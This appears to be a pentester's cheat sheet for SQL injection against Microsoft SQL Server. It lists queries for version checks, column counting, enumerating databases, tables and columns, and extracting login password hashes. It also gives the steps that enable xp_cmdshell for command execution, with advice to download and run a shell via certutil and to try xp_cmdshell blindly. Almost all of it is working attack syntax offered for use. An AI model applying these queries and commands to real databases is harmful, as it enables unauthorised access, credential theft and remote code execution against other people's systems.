MSSQL Common

For MySQL/MSSQL: select @@version can return the version, others will error

check can how many columns: order by x, keep on increasing until error. last number will be number of columns

Concatenating (concatenate put 2 together, STRING_AGG put all the values in one column as one): concat(name1,':',name2) or STRING_AGG(column_name, ',') (only 2017+)
Example:
SELECT+STRING_AGG(name,',')+FROM+master..sysdatabases;

To comment, use xx--

Show all databases: SELECT name FROM master..sysdatabases; show the database in the current one: SELECT DB_NAME()

Show the table name: SELECT name FROM master..sysobjects WHERE xtype = 'U'; (change xtype to V as well for view) OR for other DB: SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';

Show the column name if table name is mytable:
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); (For current DB only)
SELECT master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; (list colum names and types for master..sometable)

Finally select object use select * from db..table;

See which user: SELECT system_user; OR SELECT user_name();

Password hash:
MSSQL 2000: SELECT name, password FROM master..sysxlogins
MSSQL 2005: SELECT name, password_hash FROM master.sys.sql_logins
Note: If doesn’t work as expected, use the binary converted:
MSSQL 2000: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
MSSQL 2005: SELECT name + ':' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins

Check if you are sysadmin: SELECT is_srvrolemember('sysadmin');

XP_CMDSHELL (If you are doing SQL injection, can put a valid query then ; as a separator then do all the following, in the end use certutil to download shell and run):

EXECUTE sp_configure 'show advanced options', 1;
reconfigure;
EXECUTE sp_configure 'xp_cmdshell', 1;
reconfigure;
EXEC xp_cmdshell 'dir';

Error based:
cast(@@version as integer)

If you suspect there is a SQL injection and stacked based work, but cannot confirm. Can try running XP_CMDSHELL blindly.